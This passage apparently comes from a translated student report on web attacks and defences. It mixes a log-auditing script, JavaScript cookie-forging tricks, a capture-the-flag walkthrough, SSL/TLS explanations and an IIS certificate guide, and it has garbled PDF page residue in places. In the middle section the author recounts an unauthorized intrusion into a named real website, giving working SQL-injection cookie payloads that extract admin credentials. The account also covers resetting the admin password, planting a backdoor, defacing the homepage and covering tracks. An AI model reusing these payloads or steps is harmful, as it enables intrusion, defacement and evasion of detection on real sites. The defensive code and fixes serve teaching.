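    r"/\.htaccess$", r"/config\.txt$", r"/auth_user_file\.txt$",
    r"/orders\.txt$", r"/adpassword\.txt$", r"/phpinfo\.php$",
    r"/winnt/system32/", r"\.mdb$",
]
SENSITIVE_RE = re.compile("|".join(SENSITIVE_PATTERNS), re.IGNORECASE)

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines (addresses from the documentation ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Aug/2019:10:01:02 +0700] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Aug/2019:10:01:09 +0700] "GET /.bash_history HTTP/1.1" 200 812 "https://www.google.com/" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Aug/2019:10:01:15 +0700] "GET /wwwboard/passwd.txt HTTP/1.1" 404 213 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [08/Aug/2019:10:02:40 +0700] "GET /winnt/system32/cmd.exe HTTP/1.0" 403 301 "-" "curl/7.64.0"',
    '192.0.2.10 - - [08/Aug/2019:10:03:00 +0700] "GET /config.txt?ver=2 HTTP/1.1" 200 1702 "-" "Googlebot/2.1"',
]

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return a finding for a request to a sensitive path, or None for ordinary traffic."""
    path = entry["path"].split("?", 1)[0]        # ignore the query string
    if not SENSITIVE_RE.search(path):
        return None
    status = int(entry["status"])
    return {
        "ip": entry["ip"],
        "path": path,
        "status": status,
        # 200 means the server actually served the file: an exposure, not just a probe.
        "outcome": "exposed" if status == 200 else "probed",
        # The visitor came from a search-result page, i.e. the path is already findable.
        "via_search": "google." in entry["referer"].lower(),
        # A search-engine crawler fetched it, so it may be indexed soon.
        "crawler": "googlebot" in entry["ua"].lower(),
    }

def audit(lines):
    """Return (findings, per-source counts) for a list of raw log lines."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        finding = classify(entry) if entry else None
        if finding:
            findings.append(finding)
    per_ip = defaultdict(lambda: {"exposed": 0, "probed": 0})
    for f in findings:
        per_ip[f["ip"]][f["outcome"]] += 1
    return findings, dict(per_ip)

if __name__ == "__main__":
    for f in audit(SAMPLE_LOG)[0]:
        print(f)
```

An "exposed" finding means the file should be removed from the web root or blocked in the server configuration; a "probed" one tells you which names are being tried against you.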
3. Using inline JavaScript statements
I will introduce you to a web hacking technique that uses nothing but JavaScript. With this technique you can inspect and modify the values of cookies or hidden fields directly on the web page. All it takes is a browser that supports "inline JavaScript debugging", such as Internet Explorer, Netscape or Mozilla.
Basics of inline JavaScript
Most web browsers support inline JavaScript. You can execute JavaScript by typing the following into the address bar:
Code:
javascript:void()
For example, to view the current value of the cookie, type:
Code:
javascript:alert(document.cookie)
Or, to change the value of the hidden field "hiddenid" of the first form to "2":
Code:
javascript:void(document.forms[0].hiddenid.value="2")
The HTML source contains the following fragment:
...
Code:
// the expected code is stored URL-escaped so that it is not obvious in the source
var a=unescape("%43%4f%44%45%5a");
function check()
{
  // compare the value typed into input "c" of form "a" with the expected code
  if (document.a.c.value == a)
  {
    document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";
  }
  else
  {
    alert ("wrong! - letter size?");
  }
}
You can simply type the following straight into the IE address bar:
Code:
javascript:alert(unescape(a))
to get the password for the next level ("CODEZ").
Realistic mission 8 on hackthissite.org asks you to move 10 million from the account of "Gary Hunter" to the account "dropCash". After using SQL injection to obtain the username of "Gary Hunter", you carry out the transfer as follows:
Log in to your own account. In the IE address bar, type:
Code:
javascript:void(document.write('< name="the_" ="movemoney.php" method="post">< value="dropCash"name="TO" ="">< value="10000000" name="AMOUNT" ="">'))
The JavaScript above creates a form with the hidden fields
Code:
FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000
Now change the cookie as follows:
Code:
javascript:void(document.cookie="accountUsername=G aryWilliamHunter")
javascript:void(document.cookie="accountPassword=G aryWilliamHunter")
Press the "Move Money To A Different Account" button once and you are done.
I think it is very likely that mission 8 creates a session("LoggedIn").
Every time we log in it sets session("LoggedIn")=1. We only need to change the cookie value and the hidden field to perform the transfer within our own session, because it only checks session("LoggedIn")=1 without checking who the username really is.
As a final example, I will show how the website http://www.mangvieclam.com/ was hacked. I sent a message to the admin of mangvieclam.com but nobody contacted me to fix the bug. Hehe, my "message" at the bottom of the index.asp page on mangvieclam.com has still not been removed by anyone.
After logging in to mangvieclam.com, type javascript:alert(document.cookie) into the address bar to view the cookie.
You can change the personal information of any user on mangvieclam.com by changing the username cookie as follows: javascript:void(document.cookie="username=user name"), then choose the "Cập nhật thông tin" (Update information) item.
You can also change the password of any user on mangvieclam.com after logging in with your own account, as follows: choose the "Thay đổi mật khẩu" (Change password) item, type javascript:void(document.cookie="username=username"+escape("' or '1'='1")) into the address bar, enter anything as the old password and a new password, then press the "Thay đổi mật khẩu" button.
The bug is in the file icl/filerec/detail.asp, lines 43 to 65. For example, when you set the username cookie to "trungkien' or '1'='1", the following SQL statements are executed:
Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien' or '1'='1' And Passwords='md5(old password)' And Active = 1982 // always returns true because the condition or '1'='1' holds even though the old password is wrong
Update tblUserInfo Set Passwords = 'md5(new password)' Where UserID = 'trungkien' or '1'='1' And Active = 1982 // always sets the new password for user "trungkien" because the condition UserID = 'trungkien' comes before the condition '1'='1'
Unfortunately this bug cannot be exploited on http://www.mangvieclam.com/ because of a programming error:
Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien' or '1'='1' And Passwords = N'...' And Active = 1982
However, the website http://www.mangvieclam.com/ uses an MS-SQL database, so I easily obtained the admin username and password from tblConfig as follows:
First I got the username with
Code:
javascript:void(document.cookie="username="+escape ("' or1=convert(int,(select adminid from tblconfig where accid=1))--"))
Choose the "Cập nhật thông tin" (Update information) item.
The admin login name is 'ngtuan'.
Similarly I got the admin password with
Code:
javascript:void(document.cookie="username="+escape ("' or1=convert(int,(select adminpass from tblconfig where accid=1))--"))
Now I set a new password, 'hacked'.
HTML Code:
username:
password:
Upload a backdoor and change the index.asp page. Then restore the old password for the admin to avoid detection:
Code:
javascript:void(document.cookie="username="+escape ("';update tblconfig set adminpass='...' where accid=1--"))
One fix for mangvieclam.com is to replace the variable Request.Cookies("UserName") with the session variable Session("UserName"), so that the username cannot be forged as shown above.
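The cookie-trust and string-concatenation defect described above, beside the fix the author suggests, as an added Python example that is not the site's code: an in-memory SQLite table modelled on tblUserInfo (rows and hashes constructed) and a hypothetical change-password check in its vulnerable and hardened forms.

```python
import hashlib
import sqlite3

def md5(text):
    # The page's application compares MD5 hashes; mirrored here only to match that schema.
    return hashlib.md5(text.encode()).hexdigest()

def make_db():
    """In-memory table modelled on the page's tblUserInfo, with two constructed users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUserInfo (UserID TEXT, Passwords TEXT, Active INTEGER)")
    db.executemany(
        "INSERT INTO tblUserInfo VALUES (?, ?, ?)",
        [("trungkien", md5("secret1"), 1982), ("ngtuan", md5("secret2"), 1982)],
    )
    return db

# --- Vulnerable pattern (as described above): the identity comes from a cookie the
# browser can rewrite, and it is spliced into the SQL text by string concatenation.
def old_password_ok_vulnerable(db, cookies, old_password):
    user = cookies.get("username", "")
    sql = ("SELECT COUNT(UserID) FROM tblUserInfo WHERE UserID = '" + user + "'"
           " AND Passwords = '" + md5(old_password) + "' AND Active = 1982")
    # A cookie of  trungkien' or '1'='1  turns the WHERE clause into
    # U='trungkien' OR ('1'='1' AND ...), so the count is non-zero whatever the password.
    return db.execute(sql).fetchone()[0] > 0

# --- Hardened form: identity comes from server-side session state set at login (the
# Session("UserName") change suggested above), and every value is a bound parameter,
# so a quote in the input is just data and cannot change the query's structure.
def old_password_ok_hardened(db, session, old_password):
    user = session.get("username")
    if user is None:            # not logged in
        return False
    row = db.execute(
        "SELECT COUNT(UserID) FROM tblUserInfo "
        "WHERE UserID = ? AND Passwords = ? AND Active = 1982",
        (user, md5(old_password)),
    ).fetchone()
    return row[0] > 0

if __name__ == "__main__":
    db = make_db()
    forged = {"username": "trungkien' or '1'='1"}
    print("vulnerable accepts wrong password:", old_password_ok_vulnerable(db, forged, "wrong"))
    print("hardened accepts wrong password:  ", old_password_ok_hardened(db, {"username": "trungkien"}, "wrong"))
```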
4. DDoS: not yet researched
III. Some ways to secure a website
1. SSL (Secure Socket Layer)
1.1 Introduction to SSL
As we know, there are two important transport-layer security protocols that matter most for the security of web applications: SSL and TLS.
In general there have been several options for protecting HTTP traffic cryptographically. For example, in the 1990s the CommerceNet consortium proposed S-HTTP, which was essentially a security enhancement of HTTP. An implementation of S-HTTP was made publicly available in a modified version of the NCSA Mosaic browser that users had to buy (unlike the "standard" NCSA Mosaic browser, which was publicly available free of charge on the Internet).
However, at the same time Netscape Communications introduced SSL and a corresponding protocol with the first version of Netscape Navigator. Unlike the CommerceNet consortium, Netscape Communications did not charge its customers for the implementation of its security protocol. As a result, SSL became the dominant protocol for providing security services for HTTP traffic in 1994, and S-HTTP quietly disappeared.
1.2 Structure of the SSL protocol
The structure of SSL and the corresponding SSL protocol are illustrated in Figure 1.1 (SSL structure and the SSL protocol). According to this figure, SSL refers to an intermediate (security) layer between the transport layer and the application layer. SSL is layered on top of a connection-oriented and reliable transport service such as the one provided by TCP. In principle, it can provide security services for arbitrary application protocols that rely on TCP, not only HTTP. In fact, a main advantage of transport-layer security protocols in general, and of SSL in particular, is that they are application independent in the sense that they can be used to transparently protect any application protocol layered on top of TCP. Figure 1.1 illustrates several typical application protocols, including NSIIOP, HTTP, FTP, Telnet, IMAP, IRC and POP3. All of them can be protected by layering them on top of SSL (the letter S added to the corresponding protocol acronyms indicates the use of SSL). Note, however, that SSL has a strong client-server orientation and does not really meet the requirements of peer-to-peer application protocols.
Structure of SSL and the SSL protocol
In summary, the SSL protocol provides communication security with three basic properties:
1. The communicating parties (that is, the client and the server) can authenticate each other using public-key cryptography.
2. The confidentiality of the data traffic is protected because the connection is transparently encrypted after an initial handshake and session-key negotiation have taken place.
3. The authenticity and integrity of the data traffic are also protected because messages are transparently authenticated and integrity-checked using a MAC.
It is important to note, however, that SSL does not prevent traffic-analysis attacks. For example, by looking at the unencrypted source and destination IP addresses and TCP port numbers, or at the amount of data transferred, a traffic analyst can still determine which parties are interacting, which kinds of services are being used, and sometimes even obtain information about business or personal relationships. Furthermore, SSL does not prevent attacks aimed at the TCP implementation, such as TCP SYN flooding or session hijacking.
To use SSL protection, both client and server must know that the other side is using SSL. In general, there are three ways to resolve this:
1. Use dedicated port numbers reserved by the Internet Assigned Numbers Authority (IANA). In this case, a separate port number must be assigned to every application protocol that uses SSL.
2. Use the standard port number of each application protocol and negotiate the security options as part of the application protocol itself.
3. Use a TCP option to negotiate the use of a security protocol such as SSL during the normal TCP connection establishment phase.
Application-specific negotiation of security options (the second possibility) has the disadvantage that every application protocol must be modified to understand the negotiation process. Defining a TCP option (the third possibility) would be a good solution, but it has not been seriously discussed so far. In practice, separate port numbers have been reserved and assigned by IANA for every application protocol that can run on top of SSL or TLS (the first possibility). Note, however, that using separate port numbers has the disadvantage of requiring two TCP connections if the client does not know what the server supports. The client must first connect to the secure port and then to the insecure port, or the other way round. It is quite possible that later protocols will abandon this approach and adopt the second possibility. For example, SASL (Simple Authentication and Security Layer) defines a method for adding authentication support to connection-based application protocols. According to the SASL specification, the use of authentication mechanisms can be negotiated between the client and the server of a given application protocol.
The port numbers assigned by IANA to application protocols running over SSL/TLS are summarised in Table 1.2 and partly illustrated in Figure 1.1. Today, the "S" indicating the use of SSL is consistently appended (as a suffix) to the acronyms of the corresponding application protocols (in some early terminology the S was used and prefixed inconsistently in some acronyms).
1.3 SSL Record Protocol
The SSL Record Protocol receives data from the higher-layer SSL sub-protocols and handles fragmentation, compression, authentication and encryption of the data. More precisely, the protocol takes a block of data of arbitrary size as input and produces a series of SSL data fragments as output (also called records) of at most 16,383 bytes each.
Steps of the SSL Record Protocol
The individual steps of the SSL Record Protocol, which go from a raw data fragment to an SSL Plaintext record (fragmentation step), an SSL Compressed record (compression step) and an SSL Ciphertext record (encryption step), are illustrated in Figure 1.5. Finally, each SSL record contains the following fields:
- Content type;
- Protocol version number;
- Length;
- Data payload (optionally compressed and encrypted);
- MAC.
The content type identifies the higher-layer protocol that must be used to process the payload of the SSL record afterwards (after appropriate decompression and decryption). The protocol version number identifies the SSL version in use (usually version 3.0). Each SSL record payload is compressed and encrypted according to the current compression method and cipher spec defined for the SSL session.
At the start of each SSL session, the compression method and the cipher spec are usually defined as null. Both are established during the initial execution of the SSL Handshake Protocol. Finally, a MAC is appended to each SSL record. It provides message-origin authentication and data-integrity services. As with the encryption algorithm, the algorithm used to compute and verify the MAC is defined in the cipher spec of the current session state. By default, the SSL Record Protocol uses a MAC construction that is similar to, yet different from, the HMAC construction. There are three main differences between the SSL MAC construction and the HMAC construction:
- The SSL MAC construction includes a sequence number in the message before hashing, to prevent certain forms of replay attack.
- The SSL MAC construction includes the record length.
- The SSL MAC construction uses concatenation, whereas the HMAC construction uses modulo-2 addition (XOR).
All of these differences exist mainly because the SSL MAC construction predates the HMAC construction used in almost all Internet security protocol specifications. The HMAC construction is also used in the more recent TLS protocol specification.
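The record-layer fragmentation and MAC just described, as an added Python example (not from the original report); the key, payloads and sequence numbers are constructed, and the 16,383-byte limit is the figure the text gives.

```python
import hashlib
import hmac
import struct

MAX_FRAGMENT = 16383        # record payload limit as the text above states it
CT_APPLICATION_DATA = 23    # SSL content type for application data

def fragment(data, limit=MAX_FRAGMENT):
    """Fragmentation step: cut an arbitrary-size block into record-sized pieces."""
    return [data[i:i + limit] for i in range(0, len(data), limit)] or [b""]

def ssl3_mac(secret, seq_num, content_type, frag, hash_name="md5"):
    """SSL 3.0 MAC: hash(secret + pad2 + hash(secret + pad1 + seq + type + length + data)).
    The three differences from HMAC listed above are visible here: the 64-bit sequence
    number and the record length are hashed in, and the secret is concatenated with
    the pads rather than XORed with them."""
    pad_len = 48 if hash_name == "md5" else 40       # pad sizes from the SSL 3.0 specification
    pad1, pad2 = b"\x36" * pad_len, b"\x5c" * pad_len
    header = struct.pack(">QBH", seq_num, content_type, len(frag))
    inner = hashlib.new(hash_name, secret + pad1 + header + frag).digest()
    return hashlib.new(hash_name, secret + pad2 + inner).digest()

def hmac_mac(secret, seq_num, content_type, frag, hash_name="md5"):
    """The HMAC construction over the same fields, as TLS uses it, for comparison."""
    header = struct.pack(">QBH", seq_num, content_type, len(frag))
    return hmac.new(secret, header + frag, hash_name).digest()

def protect(secret, data, first_seq=0):
    """Sender side: fragment the data and attach a MAC to each record. The sequence
    number is not transmitted; both ends count the records sent on the connection."""
    records = []
    for i, frag in enumerate(fragment(data)):
        mac = ssl3_mac(secret, first_seq + i, CT_APPLICATION_DATA, frag)
        records.append((CT_APPLICATION_DATA, frag, mac))
    return records

def verify(secret, expected_seq, record):
    """Receiver side: recompute the MAC with the receiver's own sequence counter.
    A replayed or reordered record fails because its MAC was made under another seq."""
    content_type, frag, mac = record
    return hmac.compare_digest(mac, ssl3_mac(secret, expected_seq, content_type, frag))

if __name__ == "__main__":
    key = b"constructed-mac-secret"
    recs = protect(key, b"A" * 20000)
    print(len(recs), "records; all verify:", all(verify(key, i, r) for i, r in enumerate(recs)))
    print("record 0 replayed at position 1 verifies:", verify(key, 1, recs[0]))
```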
As illustrated in Figure 1.5, several SSL sub-protocols are layered on top of the SSL Record Protocol. Each sub-protocol may refer to specific message types that are sent using the SSL Record Protocol. The SSL 3.0 specification defines the following three SSL sub-protocols:
- Alert Protocol;
- Handshake Protocol;
- ChangeCipherSpec Protocol.
In short, the SSL Alert Protocol is used to convey alerts over the SSL Record Protocol. Each alert has two parts, an alert level and an alert description.
The SSL Handshake Protocol is the main SSL sub-protocol; it is used to support client and server authentication and to exchange a session key. The SSL Handshake Protocol is therefore outlined and discussed in the next section.
Finally, the SSL ChangeCipherSpec Protocol is used to switch from one cipher spec to another. Although the cipher spec is usually changed at the end of an SSL handshake, it can also be changed at any later time.
Besides these SSL sub-protocols, an SSL Application Data Protocol is used to pass application data directly to the SSL Record Protocol.
SSL Handshake Protocol:
The SSL Handshake Protocol is the main SSL sub-protocol layered on top of the SSL Record Protocol. Consequently, SSL handshake messages are supplied to the SSL record layer, where they are encapsulated in one or more SSL records that are processed and transmitted as specified by the compression method and cipher spec of the current SSL session and the cryptographic keys of the corresponding SSL connection. The purpose of the SSL Handshake Protocol is to have a client and a server establish and maintain the state information used to secure their communications. More specifically, the protocol must have the client and the server agree on a common SSL protocol version, select the compression method and cipher spec, optionally authenticate each other, and create a master secret from which the various session keys for message authentication and encryption can be derived.
In summary, an execution of the SSL Handshake Protocol between a client C and a server S can be summarised as follows (messages in square brackets are optional):
1: C -> S: CLIENTHELLO
2: S -> C: SERVERHELLO
           [CERTIFICATE]
           [SERVERKEYEXCHANGE]
           [CERTIFICATEREQUEST]
           SERVERHELLODONE
3: C -> S: [CERTIFICATE]
           CLIENTKEYEXCHANGE
           [CERTIFICATEVERIFY]
           CHANGECIPHERSPEC
           FINISHED
4: S -> C: CHANGECIPHERSPEC
           FINISHED
When client C wants to connect to server S, it establishes a TCP connection to the HTTPS port (which is not part of the protocol description) and sends a CLIENTHELLO message to the server in step 1 of the SSL Handshake Protocol execution. The client may also send a CLIENTHELLO in response to a HELLOREQUEST message, or on its own initiative to renegotiate the security parameters of an existing connection. The CLIENTHELLO message contains the following fields:
- The number of the highest SSL version understood by the client (usually 3.0).
- A client-generated random structure consisting of a 32-bit timestamp in standard UNIX format and a 28-byte value produced by a pseudo-random number generator.
- A session identifier the client wishes to use for this connection.
- A list of the cipher suites the client supports.
- A list of the compression methods the client supports.
Note that the session identity field should be empty if no SSL session currently exists or if the client wishes to generate new security parameters. In either case, a non-empty session identity field identifies an existing SSL session between client and server (that is, a session whose security parameters the client wishes to reuse). The session identifier may originate from an earlier connection, this connection, or another currently active connection. Also note that the list of supported cipher suites, passed from the client to the server in the CLIENTHELLO message, contains the cryptographic algorithm combinations supported by the client in order of preference. Each cipher suite defines a key-exchange algorithm and a cipher spec. The server selects one cipher suite or, if no acceptable choice is presented, returns an error message and closes the connection accordingly. After sending the CLIENTHELLO message, the client waits for a SERVERHELLO message. Any other message returned by the server, except a HELLOREQUEST, is treated as an error at this point.
In step 2, the server processes the CLIENTHELLO message and responds with either an error message or a SERVERHELLO message. Like the CLIENTHELLO, the SERVERHELLO message has the following fields:
- A server version number containing the lower of the version suggested by the client in the CLIENTHELLO message and the highest version supported by the server.
- A server-generated random structure, also consisting of a 32-bit timestamp in standard UNIX format and a 28-byte value produced by a random number generator.
- A session identifier corresponding to this connection.
- A cipher suite selected by the server from the list of cipher suites supported by the client.
- A compression method selected by the server from the list of compression algorithms supported by the client.
If the session identifier in the CLIENTHELLO message is not empty, the server looks in its session cache for a match. If a match is found and the server is willing to establish the new connection using the corresponding session state, the server responds with the same value supplied by the client. This indicates a resumed session and dictates that both sides must proceed directly to the CHANGECIPHERSPEC and FINISHED messages described further below. Otherwise, this field contains a different value identifying a new session. The server may also return an empty session identifier field to indicate that the session will not be cached and therefore cannot be resumed later. Also note that in the SERVERHELLO message the server selects a cipher suite and a compression method from the lists supplied by the client in the CLIENTHELLO message. The key-exchange, authentication, encryption and message-authentication algorithms are determined by the cipher suite selected by the server and revealed in the SERVERHELLO message. The cipher suites defined in the SSL protocol are essentially the same as those defined for TLS (as summarised in Tables 1.4 to 1.7 of the earlier articles).
In addition to the SERVERHELLO message, the server must also send other messages to the client. For example, if the server uses certificate-based authentication, it sends its site certificate to the client in a corresponding CERTIFICATE message. The certificate must be appropriate for the key-exchange algorithm of the selected cipher suite and is usually an X.509v3 certificate. The same message type will be used later for the client's response to the server's CERTIFICATEREQUEST message. In the case of X.509v3 certificates, a certificate may actually refer to an entire chain of certificates, ordered with the sender's certificate first, followed by any CA certificates proceeding sequentially towards a root CA (which will be accepted by the client).
Next, the server may send a SERVERKEYEXCHANGE message to the client if it has no certificate, has a certificate that can only be used to verify digital signatures, or uses the FORTEZZA token-based key-exchange algorithm (KEA). Clearly, this message is not required if the site certificate contains an RSA public key that can be used for encryption. Furthermore, a non-anonymous server can optionally request a personal certificate to authenticate the client. To do so, it sends a CERTIFICATEREQUEST message to the client. This message contains a list of the requested certificate types, sorted in the server's order of preference, as well as a list of distinguished names of acceptable CAs. At the end of step 2, the server sends a SERVERHELLODONE message to the client to indicate the end of the SERVERHELLO and accompanying messages.
After receiving the SERVERHELLO and accompanying messages, the client verifies that the server's site certificate (if supplied) is valid and checks that the security parameters supplied in the SERVERHELLO message are acceptable. If the server requested client authentication, the client sends a CERTIFICATE message containing a personal certificate for the user's public key to the server in step 3. Next, the client sends a CLIENTKEYEXCHANGE message whose format depends on the key-exchange algorithm selected by the server:
- If RSA is used for server authentication and key exchange, the client generates a 48-byte premaster secret, encrypts it with the public key found in the site certificate or with the temporary RSA key from the SERVERKEYEXCHANGE message, and sends the result back to the server in the CLIENTKEYEXCHANGE message. The server in turn uses the corresponding private key to decrypt the premaster secret.
- If FORTEZZA tokens are used for key exchange, the client derives a token encryption key (TEK) using KEA. The client's KEA computation uses the public key from the server certificate together with some private parameters in the client's token. The client sends the public parameters the server needs to generate the TEK as well, using its own private parameters. It generates a premaster secret, wraps it using the TEK, and sends the result together with some initialisation vectors to the server as part of the CLIENTKEYEXCHANGE message. The server in turn can decrypt the premaster secret accordingly. This key-exchange algorithm is not widely used.
If client authentication is required, the client also sends a CERTIFICATEVERIFY message to the server. This message is used to provide explicit verification of the user's identity based on the personal certificate. It is only sent following a client certificate that has signing capability (all certificates except those containing fixed Diffie-Hellman parameters). Finally, the client completes step 3 by sending a CHANGECIPHERSPEC message and a corresponding FINISHED message to the server. The FINISHED message is always sent immediately after the CHANGECIPHERSPEC message to confirm that the key-exchange and authentication processes were successful. In fact, the FINISHED message is the first message protected with the newly negotiated algorithms and session keys. It can only be generated and verified if these keys are properly installed on both sides. No acknowledgement of the FINISHED message is required; the parties may begin sending encrypted data immediately after sending their FINISHED message. The execution of the SSL Handshake Protocol is completed by having the server also send a CHANGECIPHERSPEC message and a corresponding FINISHED message to the client in step 4.
After the SSL handshake is complete, a secure connection is established between the client and the server. This connection can now be used to send application data encapsulated by the SSL Record Protocol. More precisely, application data can be fragmented, compressed, or encrypted and authenticated according to the SSL Record Protocol and the session and connection state information now established (depending on the execution of the SSL Handshake Protocol).
The SSL Handshake Protocol can be shortened if the client and server decide to resume a previously established (and still cached) SSL session or to duplicate an existing SSL session. In this case, only three message flows and six messages in total are required. The corresponding message flows can be summarised as follows:
1: C -> S: CLIENTHELLO
2: S -> C: SERVERHELLO
           CHANGECIPHERSPEC
           FINISHED
3: C -> S: CHANGECIPHERSPEC
           FINISHED
In step 1, the client sends a CLIENTHELLO message to the server carrying the session identifier of the session to be resumed. The server in turn checks its session cache for a match. If a match is found and the server is willing to resume the connection under the specified session state, it returns a SERVERHELLO message with the same session identifier in step 2. At this point, both client and server must send CHANGECIPHERSPEC and FINISHED messages to each other in steps 2 and 3. Once the session re-establishment is complete, the client and server can begin exchanging application data.
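The server-side decisions in steps 1 and 2 and in session resumption, as an added Python model (not from the original report or from any SSL library); the cipher-suite names, cache contents and dictionary layout are constructed for the example.

```python
import os
import struct
import time

class HandshakeFailure(Exception):
    """Raised where the text says the server returns an error and closes the connection."""

def hello_random(now=None, tail=None):
    """Random structure: 32-bit UNIX timestamp followed by 28 generator bytes."""
    ts = int(time.time() if now is None else now)
    return struct.pack(">I", ts) + (os.urandom(28) if tail is None else tail)

def server_hello(client_hello, server):
    """Build the SERVERHELLO fields from a CLIENTHELLO.

    client_hello: version (tuple), session_id (bytes), cipher_suites and
    compression_methods (lists in the client's preference order).
    server: max_version, cipher_suites, compression_methods, session_cache
    (dict: id -> state), cache_sessions (bool). Layout is constructed for this example."""
    # Version: the lower of the client's highest and the server's highest.
    version = min(client_hello["version"], server["max_version"])

    # Walk the client's list in its preference order; take the first the server supports.
    suite = next((s for s in client_hello["cipher_suites"]
                  if s in server["cipher_suites"]), None)
    if suite is None:
        raise HandshakeFailure("no acceptable cipher suite offered")
    compression = next((c for c in client_hello["compression_methods"]
                        if c in server["compression_methods"]), None)
    if compression is None:
        raise HandshakeFailure("no acceptable compression method offered")

    sid = client_hello["session_id"]
    resumed = False
    cached = server["session_cache"].get(sid) if sid else None
    if cached is not None:
        # Match found: echo the same id and reuse the cached suite/compression, so both
        # sides go straight to CHANGECIPHERSPEC and FINISHED (abbreviated handshake).
        suite, compression, resumed = cached["cipher_suite"], cached["compression"], True
    elif server["cache_sessions"]:
        sid = os.urandom(32)                       # fresh id for a new, resumable session
        server["session_cache"][sid] = {"cipher_suite": suite, "compression": compression}
    else:
        sid = b""                                  # empty id: session will not be cached
    return {"version": version, "random": hello_random(), "session_id": sid,
            "cipher_suite": suite, "compression": compression, "resumed": resumed}

if __name__ == "__main__":
    srv = {"max_version": (3, 0),
           "cipher_suites": ["SSL_RSA_WITH_3DES_EDE_CBC_SHA", "SSL_RSA_WITH_RC4_128_MD5"],
           "compression_methods": ["null"], "session_cache": {}, "cache_sessions": True}
    ch = {"version": (3, 1), "session_id": b"",
          "cipher_suites": ["SSL_RSA_WITH_RC4_128_MD5", "SSL_RSA_WITH_3DES_EDE_CBC_SHA"],
          "compression_methods": ["null"]}
    first = server_hello(ch, srv)
    second = server_hello(dict(ch, session_id=first["session_id"]), srv)
    print("negotiated", first["version"], first["cipher_suite"], "resumed:", second["resumed"])
```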
SSL encryption mechanism:
1. The client generates a random Session Key when it accesses the server.
2. The client asks the server to send its Certificate (which contains the server's Public Key).
3. The client checks the validity of the Certificate.
4. If the server's Certificate is valid, the client encrypts the Session Key with the server's Public Key.
5. The client sends the encrypted Session Key to the server.
6. The server decrypts the encrypted Session Key with its Private Key.
7. The information exchanged between server and client is encrypted and decrypted with the Session Key.
Nowadays, when publishing a website on the Internet, to apply SSL encryption we have to obtain an SSL Certificate for the web server from a Digital Certificate provider such as Verisign, CyberTrust or EnTrust.
Preparation
- A Windows Server 2003 machine
- The Internet Information Services (IIS) service installed
- A website with any content hosted and reachable at http://www.MSOpenLab.com
1. Create the certificate request:
- Log on as Administrator, open Internet Information Services (IIS) Manager, expand Web Sites, right-click Default Web Site and choose Properties.
- In the Default Web Site Properties dialog, go to the Directory Security tab and choose Server Certificate.
In the Welcome to the Web Server Certificate Wizard dialog, choose Next.
http://www.msopenlab.com/http://www.msopenlab.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
43/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
43
Hp thoi Server Certificate, chn Create anew certificate, chn Next
Trong hp thoi Delayed or Immediate Request, chn Prepare the request now,but send it later, chn Next .
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
44/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
44
Hp thoi Name and Security Settings, chn Next
Trong hp thoi Organization Information, nhp thng tin nh hnh bn di,chn Next
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
45/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
45
-Trong hp thoi Your Sites Common Name, nhp www.msopenlab.com vo Common name, chn Next
Hp thoi Geographical Information, nhp thng tin nh hnh bn di, chnNext
http://www.msopenlab.com/http://www.msopenlab.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
46/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
46
Hp thoi Certificate Request File Name, mc nh ng dn dn
C:\certreg.txt, chn Next .
- In the Request File Summary dialog, choose Next, then Finish.
- In the Default Web Site Properties dialog, choose OK and close all windows.
2. Request an SSL certificate from VeriSign.com
- Open Windows Explorer and copy the contents of the file C:\certreq.txt.
- Open Internet Explorer, go to http://www.verisign.com and choose Free SSL Trial.
- In the Free SSL Trial Certificate window, fill in all the information (*: required fields), then Continue.
- In the Welcome window, choose Continue.
- In the next window, fill in the Technical Contact section, then Continue.
- Under Select Server Platform choose Microsoft; under Select Version choose IIS 6.0. Paste the contents of certreq.txt into Paste Certificate Signing Request (CSR), obtained from your server.
- Under What do you plan to use this SSL Certificate for?, choose Web Server, then Continue.
- In the CSR Information window, enter MSOPENLAB in Challenge Phrase and Re-enter Challenge Phrase. Enter any question in Reminder Question, then Continue.
- In the Order summary & acceptance window, choose Accept.
Check: the SSL certificate request was submitted successfully.
Configure the Trusted Root Certification Authority
- Log in to the mailbox, confirm that the e-mail from [email protected] has arrived, and click the link shown in the figure below.
- On the VeriSign web page, choose VeriSign CA Certificates.
- In the Root CA Certificate window, choose Select All and copy the whole contents.
- Paste the contents into Notepad and save the file as ca.cer.
- Open Internet Explorer, go to Tools, choose Internet Options, go to the Content tab and choose Certificates.
- In the Certificates dialog, choose Import.
- In the Welcome to the Certificate Import Wizard dialog, choose Next.
- In the File to Import dialog, choose Browse, point to C:\ca.cer, then Next.
- In the Certificate Store dialog, choose Automatically select the certificate store based on the type of certificate, then Next, then Finish.
- Paste the contents into Notepad and save the file as cert.txt.
- Open Internet Information Services (IIS) Manager, right-click Default Web Site and choose Properties.
- In the Default Web Site Properties window, go to the Directory Security tab and choose Server Certificate.
- In the Welcome dialog, choose Next.
